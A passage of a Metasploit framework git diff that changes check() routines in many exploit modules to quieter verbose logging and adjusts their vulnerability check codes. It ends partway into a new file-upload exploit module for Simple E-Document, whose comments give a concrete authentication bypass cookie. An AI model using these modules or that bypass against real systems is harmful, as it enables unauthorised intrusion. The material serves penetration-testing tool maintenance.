Msf::Exploit::Remote response = register(sock) if response =~ /463/ or response =~ /464/ - print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") + vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return Exploit::CheckCode::Unknown end response = join(sock) if not response =~ /353/ and not response =~ /366/ - print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") + vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") return Exploit::CheckCode::Unknown end response = pbot_login(sock) diff --git a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb index 3341f80160..9389a464b4 100644 --- a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb +++ b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote response = register(sock) if response =~ /463/ or response =~ /464/ - print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") + vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return Exploit::CheckCode::Unknown end diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index d802275f3f..b18a55f292 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb @@ -202,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote def check - print_status("Checking for a vulnerable PHP version...") + vprint_status("Checking for a vulnerable PHP version...") # # Pick the URI and Cookie name @@ -226,14 +226,14 @@ class Metasploit3 < Msf::Exploit::Remote php_bug = false if (not res) - print_status("No response from the server") - return Exploit::CheckCode::Safe + vprint_status("No response from the server") + return Exploit::CheckCode::Unknown # User should try again end http_fingerprint({ :response => res }) # check method if (res.code != 200) - print_status("The server returned #{res.code} #{res.message}") + vprint_status("The server returned #{res.code} #{res.message}") return Exploit::CheckCode::Safe end @@ -246,29 +246,29 @@ class Metasploit3 < Msf::Exploit::Remote php_ver = php_raw.split('.') if (php_ver[0].to_i == 4 and php_ver[1] and php_ver[2] and php_ver[1].to_i < 5) - print_status("The server runs a vulnerable version of PHP (#{php_raw})") + vprint_status("The server runs a vulnerable version of PHP (#{php_raw})") php_bug = true else - print_status("The server runs a non-vulnerable version of PHP (#{php_raw})") + vprint_status("The server runs a non-vulnerable version of PHP (#{php_raw})") return Exploit::CheckCode::Safe end end # Detect the phpBB cookie name if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /(.*)_(sid|data)=/) - print_status("The server may require a cookie name of '#{$1}_data'") + vprint_status("The server may require a cookie name of '#{$1}_data'") end if(target and target['Signature']) if (res.body and res.body.match(target['Signature'])) - print_status("Detected target #{target.name}") + vprint_status("Detected target #{target.name}") else - print_status("Did not detect target #{target.name}") + vprint_status("Did not detect target #{target.name}") end end - return php_bug ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Appears + return php_bug ? Exploit::CheckCode::Appears : Exploit::CheckCode::Detected end diff --git a/modules/exploits/multi/realserver/describe.rb b/modules/exploits/multi/realserver/describe.rb index 328f86897c..0166bc45e2 100644 --- a/modules/exploits/multi/realserver/describe.rb +++ b/modules/exploits/multi/realserver/describe.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote info = http_fingerprint({ :response => res }) # check method / Custom server check if res and res['Server'] - print_status("Found RTSP: #{res['Server']}") + vprint_status("Found RTSP: #{res['Server']}") return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe diff --git a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb index eb7f5454c0..8a7ac17992 100644 --- a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb +++ b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb @@ -93,7 +93,7 @@ class Metasploit4 < Msf::Exploit::Remote end if res and res.code == 200 and res.headers['Server'] =~ /gSOAP/ and res.body =~ /OSExecuteResponse/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif res and res.code == 500 and (res.body =~ /Invalid Credentials/ or res.body =~ /Permission denied/) return Exploit::CheckCode::Detected elsif res and res.headers['Server'] =~ /gSOAP/ diff --git a/modules/exploits/multi/svn/svnserve_date.rb b/modules/exploits/multi/svn/svnserve_date.rb index d5ab61ad21..dc295f937a 100644 --- a/modules/exploits/multi/svn/svnserve_date.rb +++ b/modules/exploits/multi/svn/svnserve_date.rb @@ -85,9 +85,6 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) end - def check - end - def brute_exploit(addresses) connect diff --git a/modules/exploits/osx/arkeia/type77.rb b/modules/exploits/osx/arkeia/type77.rb index 28f61b6c38..935ed14075 100644 --- a/modules/exploits/osx/arkeia/type77.rb +++ b/modules/exploits/osx/arkeia/type77.rb @@ -61,18 +61,18 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end - print_status("Arkeia Server Information:") + vprint_status("Arkeia Server Information:") info.each_pair { |k,v| - print_status(" #{k + (" " * (30-k.length))} = #{v}") + vprint_status(" #{k + (" " * (30-k.length))} = #{v}") } if (info['System'] !~ /Darwin/) - print_status("This module only supports Mac OS X targets") + vprint_status("This module only supports Mac OS X targets") return Exploit::CheckCode::Detected end if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index 5a43d1bd59..1f7a8b2f6b 100644 --- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -57,7 +57,7 @@ class Metasploit4 < Msf::Exploit::Local def check if not file?(datastore["Tunnelblick"]) - print_error "openvpnstart not found" + vprint_error "openvpnstart not found" return CheckCode::Safe end diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb index d940379312..a7368c7b17 100644 --- a/modules/exploits/osx/local/setuid_viscosity.rb +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -57,7 +57,7 @@ class Metasploit4 < Msf::Exploit::Local def check if not file?(datastore["Viscosity"]) - print_error "ViscosityHelper not found" + vprint_error "ViscosityHelper not found" return CheckCode::Safe end diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb index e4b92f24ca..0172023586 100644 --- a/modules/exploits/osx/local/sudo_password_bypass.rb +++ b/modules/exploits/osx/local/sudo_password_bypass.rb @@ -107,16 +107,16 @@ class Metasploit3 < Msf::Exploit::Local # check vn between 1.6.0 through 1.7.10p6 # and 1.8.0 through 1.8.6p6 if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES) - print_error "sudo version #{sudo_vn} not vulnerable." + vprint_error "sudo version #{sudo_vn} not vulnerable." return Exploit::CheckCode::Safe end else - print_error "sudo not detected on the system." + vprint_error "sudo not detected on the system." return Exploit::CheckCode::Safe end if not user_in_admin_group? - print_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)." + vprint_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)." return Exploit::CheckCode::Safe end # one root for you sir diff --git a/modules/exploits/unix/local/setuid_nmap.rb b/modules/exploits/unix/local/setuid_nmap.rb index 0cdca26ede..78acb267d1 100644 --- a/modules/exploits/unix/local/setuid_nmap.rb +++ b/modules/exploits/unix/local/setuid_nmap.rb @@ -56,7 +56,7 @@ class Metasploit4 < Msf::Exploit::Local def check stat = session.fs.file.stat(datastore["Nmap"]) if stat and stat.file? and stat.setuid? - print_good("#{stat.prettymode} #{datastore["Nmap"]}") + vprint_good("#{stat.prettymode} #{datastore["Nmap"]}") return CheckCode::Vulnerable end return CheckCode::Safe diff --git a/modules/exploits/unix/misc/qnx_qconn_exec.rb b/modules/exploits/unix/misc/qnx_qconn_exec.rb index 56be38b558..60fbffab6f 100644 --- a/modules/exploits/unix/misc/qnx_qconn_exec.rb +++ b/modules/exploits/unix/misc/qnx_qconn_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote # send check fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4) - print_status("#{@peer} - Sending check") + vprint_status("#{@peer} - Sending check") connect req = "service launcher\n" req << "start/flags run /bin/echo /bin/echo #{fingerprint}\n" @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif res and res =~ /QCONN/ return Exploit::CheckCode::Detected else - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end end diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb index 63d47f8458..f0d80253af 100644 --- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb +++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote def check connect banner = sock.get_once.strip - print_status("#{rhost}:#{rport} - Banner: #{banner}") + vprint_status("#{rhost}:#{rport} - Banner: #{banner}") disconnect # Vulnerable version info obtained from CVE diff --git a/modules/exploits/unix/webapp/arkeia_upload_exec.rb b/modules/exploits/unix/webapp/arkeia_upload_exec.rb index 7529d55850..1d4cf75356 100644 --- a/modules/exploits/unix/webapp/arkeia_upload_exec.rb +++ b/modules/exploits/unix/webapp/arkeia_upload_exec.rb @@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - Version #{version} detected") + vprint_status("#{peer} - Version #{version} detected") if version > "10.0.10" return Exploit::CheckCode::Safe end # Check for vulnerable component - print_status("#{peer} - Trying to detect the vulnerable component") + vprint_status("#{peer} - Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /Les versions brutes des messages est affichee ci-dessous/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb index 435677d479..0ac6810817 100644 --- a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb +++ b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote # Check version peer = "#{rhost}:#{rport}" - print_status("#{peer} - Trying to detect installed version") + vprint_status("#{peer} - Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -67,12 +67,12 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - Version #{version} detected") + vprint_status("#{peer} - Version #{version} detected") if version > "2.6" return Exploit::CheckCode::Safe else - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb index 929f0f23c4..54994f0a79 100644 --- a/modules/exploits/unix/webapp/coppermine_piceditor.rb +++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) if (res and res.body =~ /Coppermine Picture Editor/i) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/unix/webapp/egallery_upload_exec.rb b/modules/exploits/unix/webapp/egallery_upload_exec.rb index e21e9f9294..da7be29e11 100644 --- a/modules/exploits/unix/webapp/egallery_upload_exec.rb +++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.empty? - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/flashchat_upload_exec.rb b/modules/exploits/unix/webapp/flashchat_upload_exec.rb index 08e9f91c85..020ff6a9d6 100644 --- a/modules/exploits/unix/webapp/flashchat_upload_exec.rb +++ b/modules/exploits/unix/webapp/flashchat_upload_exec.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => uri}) if not res - print_error("#{peer} - Connection timed out") + vprint_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end @@ -71,10 +71,10 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - Version found: #{version}") + vprint_status("#{peer} - Version found: #{version}") if version =~ /6\.0\.(2|4|5|6|7|8)/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif version <= "6.0.8" return Exploit::CheckCode::Detected else diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb index 2c62df9b48..a5b410086f 100644 --- a/modules/exploits/unix/webapp/foswiki_maketext.rb +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -164,11 +164,11 @@ class Metasploit3 < Msf::Exploit::Remote if version <= "1.1.6" return Exploit::CheckCode::Appears else - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Detected end end - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index 246d170d5a..16e14a3c94 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb @@ -73,15 +73,14 @@ class Metasploit3 < Msf::Exploit::Remote }, 10) if (res and res.body =~ /cannot be resolved to an ip address/) - print_status("This system appears to be vulnerable") - return Exploit::CheckCode::Vulnerable + vprint_status("This system appears to be vulnerable") + return Exploit::CheckCode::Appears end if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/) - print_status("This system appears to be patched") + vprint_status("This system appears to be patched") end - print_status("This system is not exploitable") return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index ce2340c4be..ae6cfbfe69 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote login if not @session_id or @session_id.empty? - print_error "#{peer} - Authentication failed" + vprint_error "#{peer} - Authentication failed" return Exploit::CheckCode::Unknown end diff --git a/modules/exploits/unix/webapp/havalite_upload_exec.rb b/modules/exploits/unix/webapp/havalite_upload_exec.rb index 59f4fc4945..bfabfaf7ea 100644 --- a/modules/exploits/unix/webapp/havalite_upload_exec.rb +++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => uri}) if not res - print_error("#{peer} - Connection timed out") + vprint_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end @@ -69,11 +69,11 @@ class Metasploit3 < Msf::Exploit::Remote version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || '' if not version.empty? and version =~ /1\.1\.7/ - print_status("#{peer} - Version found: #{version}") - return Exploit::CheckCode::Vulnerable + vprint_status("#{peer} - Version found: #{version}") + return Exploit::CheckCode::Appears end - Exploit::CheckCode::Unknown + Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/instantcms_exec.rb b/modules/exploits/unix/webapp/instantcms_exec.rb index 6eca2fc931..570fb63323 100644 --- a/modules/exploits/unix/webapp/instantcms_exec.rb +++ b/modules/exploits/unix/webapp/instantcms_exec.rb @@ -52,18 +52,11 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res - if res.body.match(/Build Date/) - return Exploit::CheckCode::Vulnerable - else - return Exploit::CheckCode::Safe - end - else - return Exploit::CheckCode::Unknown + if res and res.body.match(/Build Date/) + return Exploit::CheckCode::Vulnerable end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - return Exploit::CheckCode::Unknown + Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb index d4aa24d0ab..8be862ed3b 100644 --- a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb +++ b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote version = ( get_version || '').to_s if (version.match(%r{1\.5\.7\.1[0-4]?})) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index e24b7604ed..6149c8cdfd 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb @@ -70,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and (res.code == 200 or res.code == 302) if res.body =~ /You are not authorised to view this resource/ - print_status("#{peer} - Joomla Media Manager Found but authentication required") + vprint_status("#{peer} - Joomla Media Manager Found but authentication required") return Exploit::CheckCode::Detected elsif res.body =~ /
normalize_uri(target_uri.path, "index.php") }) if not res - print_error("#{peer} - Request timed out") + vprint_error("#{peer} - Request timed out") return Exploit::CheckCode::Unknown elsif res.body =~ /Kimai/ and res.body =~ /(0\.9\.[\d\.]+)<\/strong>/ version = "#{$1}" print_good("#{peer} - Found version: #{version}") if version >= "0.9.2" and version <= "0.9.2.1306" - return Exploit::CheckCode::Detected - else - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Appears end end - Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/unix/webapp/libretto_upload_exec.rb b/modules/exploits/unix/webapp/libretto_upload_exec.rb index 29f54e4d8f..09bb854bec 100644 --- a/modules/exploits/unix/webapp/libretto_upload_exec.rb +++ b/modules/exploits/unix/webapp/libretto_upload_exec.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res - print_error("#{peer} - Connection timed out") + vprint_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end diff --git a/modules/exploits/unix/webapp/mybb_backdoor.rb b/modules/exploits/unix/webapp/mybb_backdoor.rb index 791d0653ee..913641b07b 100644 --- a/modules/exploits/unix/webapp/mybb_backdoor.rb +++ b/modules/exploits/unix/webapp/mybb_backdoor.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - print_status("Checking target") + vprint_status("Checking target") res = send_request_raw({ 'method' => 'GET', 'uri' => uri diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb index ee122919cf..4bba1a2ef0 100644 --- a/modules/exploits/unix/webapp/nagios3_history_cgi.rb +++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb @@ -164,16 +164,16 @@ class Metasploit3 < Msf::Exploit::Remote mytarget = select_target(banner, version) if mytarget.nil? - print_error("No matching target") + vprint_error("No matching target") return CheckCode::Unknown end if alert.nil? - print_error("At least one ALERT is needed in order to exploit") + vprint_error("At least one ALERT is needed in order to exploit") return CheckCode::Detected end - return CheckCode::Vulnerable + return CheckCode::Appears end def exploit diff --git a/modules/exploits/unix/webapp/nagios_graph_explorer.rb b/modules/exploits/unix/webapp/nagios_graph_explorer.rb index 2a1d2c68bf..0295f0f7db 100644 --- a/modules/exploits/unix/webapp/nagios_graph_explorer.rb +++ b/modules/exploits/unix/webapp/nagios_graph_explorer.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 404 - print_error("Remote host does not have Graph Explorer installed.") + vprint_error("Remote host does not have Graph Explorer installed.") elsif res and res.body =~ /Your session has timed out/ return Exploit::CheckCode::Detected end diff --git a/modules/exploits/unix/webapp/narcissus_backend_exec.rb b/modules/exploits/unix/webapp/narcissus_backend_exec.rb index 6f65bc56a8..3672d2fb00 100644 --- a/modules/exploits/unix/webapp/narcissus_backend_exec.rb +++ b/modules/exploits/unix/webapp/narcissus_backend_exec.rb @@ -83,14 +83,14 @@ class Metasploit3 < Msf::Exploit::Remote def check sig = rand_text_alpha(rand(10) + 5) #The string to check - print_status("#{peer} - Looking for signature '#{sig}'...") + vprint_status("#{peer} - Looking for signature '#{sig}'...") res = remote_exe("echo #{sig}") if res and res.body =~ /#{sig}/ - print_status("#{peer} - Signature '#{sig}' found.") + vprint_status("#{peer} - Signature '#{sig}' found.") return Exploit::CheckCode::Vulnerable else - print_status("#{peer} - Signature not found") + vprint_status("#{peer} - Signature not found") return Exploit::CheckCode::Safe end end diff --git a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb index 65916cc599..0669cfdd87 100644 --- a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb +++ b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb @@ -77,13 +77,13 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, "ofc_upload_image.php"), }) if not res - print_error("#{peer} - Connection timed out") + vprint_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown elsif res.code.to_i == 404 - print_error("#{peer} - No ofc_upload_image.php found") + vprint_error("#{peer} - No ofc_upload_image.php found") elsif res and res.code == 200 and res.body =~ /Saving your image to/ vprint_status("#{peer} - Found ofc_upload_image.php") - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index a4c76f8a81..a795414f59 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -69,10 +69,10 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - Version #{version} detected") + vprint_status("#{peer} - Version #{version} detected") if version < "4.1.2" - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/openemr_upload_exec.rb b/modules/exploits/unix/webapp/openemr_upload_exec.rb index dfffcc4287..243b6b31ff 100644 --- a/modules/exploits/unix/webapp/openemr_upload_exec.rb +++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" # Check version - print_status("#{peer} - Trying to detect installed version") + vprint_status("#{peer} - Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - Version #{version} detected") + vprint_status("#{peer} - Version #{version} detected") if version > "4.1.1" return Exploit::CheckCode::Safe end # Check for vulnerable component - print_status("#{peer} - Trying to detect the vulnerable component") + vprint_status("#{peer} - Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /Saving your image to/ - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/unix/webapp/opensis_modname_exec.rb b/modules/exploits/unix/webapp/opensis_modname_exec.rb index 6db0c66ab7..5e24801888 100644 --- a/modules/exploits/unix/webapp/opensis_modname_exec.rb +++ b/modules/exploits/unix/webapp/opensis_modname_exec.rb @@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote def check return Exploit::CheckCode::Unknown unless login(datastore['USERNAME'], datastore['PASSWORD']) fingerprint = Rex::Text.rand_text_alphanumeric(rand(10)+10) - print_status("#{peer} - Sending check") + vprint_status("#{peer} - Sending check") res = execute_command("echo #{fingerprint}") if res and res.body =~ /align=center>#{fingerprint}/ return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb index 17e82bfdec..a0eac8db57 100644 --- a/modules/exploits/unix/webapp/openx_banner_edit.rb +++ b/modules/exploits/unix/webapp/openx_banner_edit.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe if (vers[0] > 2) return Exploit::CheckCode::Safe if (vers[1] > 8) return Exploit::CheckCode::Safe if (vers[0] == 2 && vers[1] == 8 && vers[2] >= 2) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb index 1f31db9b3d..eb1393d33a 100644 --- a/modules/exploits/unix/webapp/php_charts_exec.rb +++ b/modules/exploits/unix/webapp/php_charts_exec.rb @@ -79,14 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.body =~ /#{fingerprint}/ return Exploit::CheckCode::Vulnerable - else - return Exploit::CheckCode::Safe end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown - + return Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/unix/webapp/php_eval.rb b/modules/exploits/unix/webapp/php_eval.rb index 3f3b786b33..b39281daca 100644 --- a/modules/exploits/unix/webapp/php_eval.rb +++ b/modules/exploits/unix/webapp/php_eval.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote if response.code == 200 return Exploit::CheckCode::Detected end - print_error("Server responded with #{response.code}") + vprint_error("Server responded with #{response.code}") return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb index 49ca4bd598..cdb3f7c30a 100644 --- a/modules/exploits/unix/webapp/php_include.rb +++ b/modules/exploits/unix/webapp/php_include.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Checking uri #{rhost+tpath+uri}") response = send_request_raw({ 'uri' => tpath+uri}) return Exploit::CheckCode::Detected if response.code == 200 - print_error("Server responded with #{response.code}") + vprint_error("Server responded with #{response.code}") return Exploit::CheckCode::Safe else return Exploit::CheckCode::Unknown diff --git a/modules/exploits/unix/webapp/php_wordpress_total_cache.rb b/modules/exploits/unix/webapp/php_wordpress_total_cache.rb index fa17f8521d..d0ffa55992 100644 --- a/modules/exploits/unix/webapp/php_wordpress_total_cache.rb +++ b/modules/exploits/unix/webapp/php_wordpress_total_cache.rb @@ -183,14 +183,14 @@ class Metasploit3 < Msf::Exploit::Remote def check res = wordpress_and_online? unless res - print_error("#{peer} does not seeem to be Wordpress site") + vprint_error("#{peer} does not seeem to be Wordpress site") return Exploit::CheckCode::Unknown end if res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /W3 Total Cache\/([0-9\.]*)/ version = $1 if version <= "0.9.2.8" - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end @@ -200,7 +200,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end end diff --git a/modules/exploits/unix/webapp/projectpier_upload_exec.rb b/modules/exploits/unix/webapp/projectpier_upload_exec.rb index 713de00e18..c9e2c4f6a2 100644 --- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.body =~ /Welcome to ProjectPier 0\.8\.[0-8]/ and res.headers['Server'] =~ /^Apache/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb new file mode 100644 index 0000000000..59a13ca1d0 --- /dev/null +++ b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb @@ -0,0 +1,149 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => "Simple E-Document Arbitrary File Upload", + 'Description' => %q{ + This module exploits a file upload vulnerability found in Simple + E-Document versions 3.0 to 3.1. Attackers can bypass authentication and + abuse the upload feature in order to upload malicious PHP files which + results in arbitrary remote code execution as the web server user. File + uploads are disabled by default. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'vinicius777[at]gmail.com', # Auth bypass discovery and PoC, kinda + 'Brendan Coles ' # Metasploit + ], + 'References' => + [ + # This EDB uses SQLI for auth bypass which isn't needed. + # Sending "Cookie: access=3" with all requests is all + # that's needed for auth bypass. + ['EDB', 